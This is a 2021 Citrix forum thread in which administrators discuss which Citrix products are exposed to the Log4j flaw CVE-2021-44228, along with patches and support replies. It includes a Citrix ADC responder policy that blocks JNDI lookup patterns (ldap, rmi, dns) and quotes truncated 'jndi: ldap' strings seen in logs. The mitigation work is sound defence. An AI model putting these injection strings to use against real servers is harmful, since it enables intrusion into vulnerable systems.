Bernd Laenge Posted December 11, 2021 Share Posted December 11, 2021 Hi all, just wanted to know if Citrix Products are affected from the log4j vulnerability as well? CEM on premise? ADC? CVAD? others? https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ greetings Bernd Link to comment
1 Francis Guilbault1709153111 Posted December 11, 2021 Share Posted December 11, 2021 Citrix Security Advisory for Apache CVE-2021-44228https://support.citrix.com/article/CTX335705 1 Link to comment
0 Scott Bowling Posted December 11, 2021 Share Posted December 11, 2021 The Linux VDA appears to be impacted. But won't really know till Citrix support provides updates. Link to comment
0 Thingbaijam Lenin Singh 2 Posted December 12, 2021 Share Posted December 12, 2021 Keeping an eye >> Citrix is closely monitoring the recent vulnerability disclosure by Apache Software Foundation on December 10th, 2021 - CVE-2021-44228. Citrix has mobilized its Security and IT organizations to investigate the issue and immediately mitigate potential risks. Please find below the status of the products which are currently being investigated: Customers who use Citrix ADC or Citrix Gateway as MPX, VPX or SDX instances and who are also not using the WIonNS feature are not impacted by this issue. Citrix is continuing to investigate any potential impact on the WIonNS feature deployments. Citrix is also continuing to investigate any potential impact on CPX and BLX instances. Link to comment
0 Erwin de Beer1709152891 Posted December 14, 2021 Share Posted December 14, 2021 After 4 days still no information about if XenMobile is vulnerable. This is very worrying ... Link to comment
0 Eugene Beliaev Posted December 14, 2021 Share Posted December 14, 2021 Add on ADC to protect vServer (bind to vserver or globaly as responder) add policy patset patset_cve_2021_44228 bind policy patset patset_cve_2021_44228 ldap bind policy patset patset_cve_2021_44228 http bind policy patset patset_cve_2021_44228 https bind policy patset patset_cve_2021_44228 ldaps bind policy patset patset_cve_2021_44228 rmi bind policy patset patset_cve_2021_44228 dns bind policy patset patset_cve_2021_44228 nis bind policy patset patset_cve_2021_44228 iiop bind policy patset patset_cve_2021_44228 corba bind policy patset patset_cve_2021_44228 nds add responder policy mitigate_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE. SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP Link to comment
0 Joseph Rucker Posted December 14, 2021 Share Posted December 14, 2021 Any latest update on Security Advisory for Apache CVE-2021-44228 Link to comment
0 David Nguyen1709155977 Posted December 14, 2021 Share Posted December 14, 2021 On 12/11/2021 at 6:56 AM, Scott Bowling said: The Linux VDA appears to be impacted. But won't really know till Citrix support provides updates. I do see that log4j is available and used for debugging for Linux VDA...but commented out...not sure if that is enough though.. Link to comment
0 Krsh K. Posted December 15, 2021 Share Posted December 15, 2021 Hi. When I run the last command I get a massage that says "Action not found". What gives? I have done it on a bunch of netscalers with same result please help Link to comment
0 Paul Jacobsen1709160118 Posted December 15, 2021 Share Posted December 15, 2021 On 12/14/2021 at 1:43 PM, Erwin de Beer1709152891 said: After 4 days still no information about if XenMobile is vulnerable. This is very worrying ... Yes, Citrix Endpoint Management (aka XenMobile) is affected by the log4j vulnerability. If you have a firewall between the internet and your Citrix Endpoint Management nodes, block outgoing LDAP/LDAPS/DNS Reverse callback. Link to comment
0 Melissa Nelson Posted December 15, 2021 Share Posted December 15, 2021 6 hours ago, Paul Jacobsen1709160118 said: Yes, Citrix Endpoint Management (aka XenMobile) is affected by the log4j vulnerability. If you have a firewall between the internet and your Citrix Endpoint Management nodes, block outgoing LDAP/LDAPS/DNS Reverse callback. Can your users still enroll devices with that block enabled? Link to comment
0 Alex Coviello Posted December 16, 2021 Share Posted December 16, 2021 Curious, if Citrix ADC is not affected: Citrix ADC (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) Not impacted (all platforms) Why do we need to add this? What Customers Should Do Citrix has released configurations that are designed to mitigate the risk of exploit of CVE-2021-44228. Citrix ADC Standard, Advanced or Premium edition customers may use responder policies for protection as shown below. Please bind the responder policy to the appropriate bind point (vserver or global). add policy patset patset_cve_2021_44228 bind policy patset patset_cve_2021_44228 ldap bind policy patset patset_cve_2021_44228 http bind policy patset patset_cve_2021_44228 https bind policy patset patset_cve_2021_44228 ldaps bind policy patset patset_cve_2021_44228 rmi bind policy patset patset_cve_2021_44228 dns add responder policy mitigate_exploit_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE. SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP Link to comment
0 Sabine Ludewig1709156713 Posted December 16, 2021 Share Posted December 16, 2021 16 hours ago, Krsh K. said: Hi. When I run the last command I get a massage that says "Action not found". What gives? I have done it on a bunch of netscalers with same result please help Same here, pls keep me posted if you find a solution. Do you have Web Application Firewall turned on? We don't, and my guess is that this a the reason, but not sure Link to comment
0 Sabine Ludewig1709156713 Posted December 16, 2021 Share Posted December 16, 2021 7 hours ago, Alex Coviello said: Curious, if Citrix ADC is not affected: Citrix ADC (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) Not impacted (all platforms) Why do we need to add this? What Customers Should Do Citrix has released configurations that are designed to mitigate the risk of exploit of CVE-2021-44228. Citrix ADC Standard, Advanced or Premium edition customers may use responder policies for protection as shown below. Please bind the responder policy to the appropriate bind point (vserver or global). add policy patset patset_cve_2021_44228 bind policy patset patset_cve_2021_44228 ldap bind policy patset patset_cve_2021_44228 http bind policy patset patset_cve_2021_44228 https bind policy patset patset_cve_2021_44228 ldaps bind policy patset patset_cve_2021_44228 rmi bind policy patset patset_cve_2021_44228 dns add responder policy mitigate_exploit_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE. SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP Wondering the same here. The blog they are referring to below this statement talks about Web Application Firewall, which we don't use. Yet, my custoner ran a security scan and found the system vulnerable to Log4j. In the same context Citrix advices us to implement Apache patche as they come available. Sorry Citrix, but it's YOUR job to provide us with a working solution and not have us compiling linux libraries without (sorry for the vent) Link to comment
0 Erwin de Beer1709152891 Posted December 16, 2021 Share Posted December 16, 2021 On 12/14/2021 at 1:43 PM, Erwin de Beer1709152891 said: After 4 days still no information about if XenMobile is vulnerable. This is very worrying ... I've called Citrix support. They let me know XenMobile is indeed affected by the bug and a patch is available for the 10.14 release: https://support.citrix.com/article/CTX335763 No word on how much we were exposed unfortunately. Also no mention of the vulnerability in the release notes. Link to comment
0 Andreas Schott Posted December 16, 2021 Share Posted December 16, 2021 We have the answer from support that the patch (https://support.citrix.com/article/CTX335763) does not contain a fix for CVE-2021-44248. They keep working on it. Link to comment
0 Erwin de Beer1709152891 Posted December 16, 2021 Share Posted December 16, 2021 6 minutes ago, Andreas Schott said: We have the answer from support that the patch (https://support.citrix.com/article/CTX335763) does not contain a fix for CVE-2021-44248. They keep working on it. Really? Omg again they totally drop the ball on a major security issue. Link to comment
0 Erwin de Beer1709152891 Posted December 16, 2021 Share Posted December 16, 2021 1 hour ago, Andreas Schott said: We have the answer from support that the patch (https://support.citrix.com/article/CTX335763) does not contain a fix for CVE-2021-44248. They keep working on it. Just asked support again and this is their response... Yes, the RP contains the mitigation steps, these are released yesterday after testing by our product team and the docs are in the process of being updated. The tentative date is by tomorrow, but you could consider the mail from our end as a confirmation for the same Please let me know if you have any further queries on this. <name redacted> Senior Technical Support Engineer Citrix Endpoint Management & Content Collaboration Support Citrix R & D India Private Limited Link to comment
0 Andreas Schott Posted December 16, 2021 Share Posted December 16, 2021 31 minutes ago, Erwin de Beer1709152891 said: Just asked support again and this is their response... Yes, the RP contains the mitigation steps, these are released yesterday after testing by our product team and the docs are in the process of being updated. The tentative date is by tomorrow, but you could consider the mail from our end as a confirmation for the same Please let me know if you have any further queries on this. <name redacted> Senior Technical Support Engineer Citrix Endpoint Management & Content Collaboration Support Citrix R & D India Private Limited I asked support again and it was confirmed to me that RP contains mitigation steps. It's a security RP. Link to comment
0 Erwin de Beer1709152891 Posted December 16, 2021 Share Posted December 16, 2021 3 minutes ago, Andreas Schott said: I asked support again and it was confirmed to me that RP contains mitigation steps. It's a security RP. Installed the patch and can confirm the system is no longer vulnerable using the available test tools. Link to comment
0 Melissa Nelson Posted December 16, 2021 Share Posted December 16, 2021 Which RP has the mitigation? 10.13 rolling patch 5 and 10.14 rolling patch 2? Link to comment
0 Thomas Greszlig Posted December 16, 2021 Share Posted December 16, 2021 Hi, Ist there a way to check th XenMobile log? On the Netscaler I can se it in the httpaccess-vpn logs. on XenMobile i find the logs but found nothing to CVE-2021-44228. Anyone know in which file i need to look at? Link to comment
0 Kurt Wagner1709157299 Posted December 16, 2021 Share Posted December 16, 2021 5 hours ago, Thomas Greszlig said: Hi, Ist there a way to check th XenMobile log? On the Netscaler I can se it in the httpaccess-vpn logs. on XenMobile i find the logs but found nothing to CVE-2021-44228. Anyone know in which file i need to look at? I too am interested in finding out which logs to check for evidence of an intrusion if there was indeed one. Here is what support told me which is hardly inspiring confidence: "You could look in the support bundle: https://docs.citrix.com/en-us/xenmobile/server/monitor-support/support-bundles.html But I do not know what you would need to look for, or if it would be included there". Link to comment
0 Thomas Greszlig Posted December 17, 2021 Share Posted December 17, 2021 Hi, I also has an open case by citrix. Only links how get normal logs files. So annoying. I asked the now the third time how to exactly detect an attack. On the NEtscaler i see it in the httpaccess-vpn logs. Something like that:jndi: ldap: //195.54 ..... . But at the XenMobile Server there is no log like that. I checked the whole hard disk. So is the XenMobile Server really atackable to this special way or is the server only use an attackable version of LOG4J? I dont see any hints that the XenMobile Server triedt to connect an server on the internet via LDAP. But I see incomming traffic with jndi: ldap: //195.54 ..... Link to comment
0 Thomas Greszlig Posted December 17, 2021 Share Posted December 17, 2021 Hi there, I spoke to Citrix support in Germany -> XenMobile was using a vulnerable version of LOG4J. But with current attempts like ldap: //195.54 ..... via 443 to the XenMobile website, it is not possible to take over XenMobile (to get bash etc.). That also coincides with my findings. I see in the Logs of the Firewall incomming traffic with ldap: //195.54 ..... but no outgoing traffic from the XenMobile Server. I n the new RPs is version 2.16.0 installed Link to comment
Question
Bernd Laenge
Hi all,
just wanted to know if Citrix Products are affected from the log4j vulnerability as well?
CEM on premise?
ADC?
CVAD?
others?
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
greetings Bernd
Link to comment
24 answers to this question
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now